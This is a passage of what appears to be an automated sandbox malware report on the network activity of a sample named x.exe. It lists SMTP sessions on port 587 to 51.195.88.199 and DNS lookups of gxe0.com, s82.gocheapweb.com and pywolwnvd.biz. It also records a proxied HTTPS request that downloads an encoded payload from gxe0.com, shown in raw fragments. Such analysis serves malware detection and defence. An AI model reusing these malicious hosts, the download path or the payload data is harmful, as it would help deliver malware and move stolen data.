Nov 13, 2024 16:31:56.627758026 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.627836943 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:31:56.628758907 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.628809929 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:31:56.628917933 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.628953934 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:31:56.629321098 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.629467010 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.629611015 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.629637957 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.629664898 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.629697084 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631408930 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631436110 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631462097 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631493092 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631603003 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.631633997 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.632401943 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.632428885 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.632582903 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.632688999 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633410931 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633436918 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633467913 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633560896 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633610964 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633637905 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633665085 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.633765936 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.634162903 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.634337902 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.634366035 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:56.634397030 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:57.124977112 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:57.336260080 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:31:57.337466955 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:12.514672041 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:12.520471096 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:12.757272005 CET	587	49998	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:12.757672071 CET	49998	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:12.757975101 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:12.763537884 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:12.763693094 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:13.574069977 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:13.574223042 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:13.579103947 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:13.819650888 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:13.820188046 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:13.825304031 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.077152014 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.083352089 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:14.088423014 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.344640017 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.344698906 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.344738007 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.344794035 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:14.345832109 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:14.350713968 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.590715885 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.591506004 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:14.596529961 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.836697102 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:14.837016106 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:14.842017889 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.087905884 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.088130951 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:15.093697071 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.339701891 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.339903116 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:15.344810009 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.585180044 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.585669994 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:15.590800047 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.837435007 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:15.837718964 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:15.863526106 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.104465008 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.104752064 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.104825020 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.104825020 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.104964018 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.105900049 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.109680891 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.109707117 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.109720945 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.109743118 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110250950 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110673904 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110757113 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110812902 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110816002 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110831976 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110846043 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110855103 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110861063 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110877991 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110888958 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110913038 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.110918999 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110961914 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.110965967 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.111006975 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.115044117 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.115094900 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.115138054 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.115181923 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.115389109 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.115446091 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.116785049 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.116832018 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.116952896 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.116992950 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.117626905 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.117748976 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.120619059 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.120691061 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.121484041 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.121531963 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.121887922 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.121934891 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.122458935 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.122538090 CET	49999	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:32:16.122704029 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.122999907 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123013020 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123025894 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123125076 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123137951 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123151064 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123173952 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123186111 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123198032 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.123280048 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.125633955 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.125730038 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.125742912 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126296997 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126348972 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126363039 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126374006 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126389027 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126673937 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126694918 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126708031 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.126719952 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127438068 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127526045 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127540112 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127568007 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127608061 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.127620935 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.627826929 CET	587	49999	51.195.88.199	192.168.2.5
Nov 13, 2024 16:32:16.670675993 CET	49999	587	192.168.2.5	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 16:28:01.525623083 CET	56238	53	192.168.2.5	1.1.1.1
Nov 13, 2024 16:28:01.556653023 CET	53	56238	1.1.1.1	192.168.2.5
Nov 13, 2024 16:28:13.520138979 CET	63756	53	192.168.2.5	1.1.1.1
Nov 13, 2024 16:28:13.527774096 CET	53	63756	1.1.1.1	192.168.2.5
Nov 13, 2024 16:28:17.699949980 CET	64764	53	192.168.2.5	1.1.1.1
Nov 13, 2024 16:28:17.714006901 CET	53	64764	1.1.1.1	192.168.2.5
Nov 13, 2024 16:28:25.453807116 CET	57911	53	192.168.2.5	1.1.1.1
Nov 13, 2024 16:28:25.461555004 CET	53	57911	1.1.1.1	192.168.2.5
Nov 13, 2024 16:28:33.704416990 CET	57730	53	192.168.2.5	1.1.1.1
Nov 13, 2024 16:28:33.712285995 CET	53	57730	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 16:28:01.525623083 CET	192.168.2.5	1.1.1.1	0xc04a	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:13.520138979 CET	192.168.2.5	1.1.1.1	0x1c14	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:17.699949980 CET	192.168.2.5	1.1.1.1	0x740e	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:25.453807116 CET	192.168.2.5	1.1.1.1	0xbfee	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:33.704416990 CET	192.168.2.5	1.1.1.1	0xa110	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 16:28:01.556653023 CET	1.1.1.1	192.168.2.5	0xc04a	No error (0)	gxe0.com	198.252.105.91	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:13.527774096 CET	1.1.1.1	192.168.2.5	0x1c14	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:13.527774096 CET	1.1.1.1	192.168.2.5	0x1c14	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:13.527774096 CET	1.1.1.1	192.168.2.5	0x1c14	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:17.714006901 CET	1.1.1.1	192.168.2.5	0x740e	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:25.461555004 CET	1.1.1.1	192.168.2.5	0xbfee	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 13, 2024 16:28:33.712285995 CET	1.1.1.1	192.168.2.5	0xa110	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	198.252.105.91	443	348	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 15:28:02 UTC	161	OUT	GET /yak/233_Wisrysxlfss HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-11-13 15:28:02 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Mon, 28 Oct 2024 23:14:08 GMT accept-ranges: bytes content-length: 2562520 date: Wed, 13 Nov 2024 15:28:02 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-13 15:28:02 UTC	1003	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
2024-11-13 15:28:02 UTC	14994	IN	Data Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
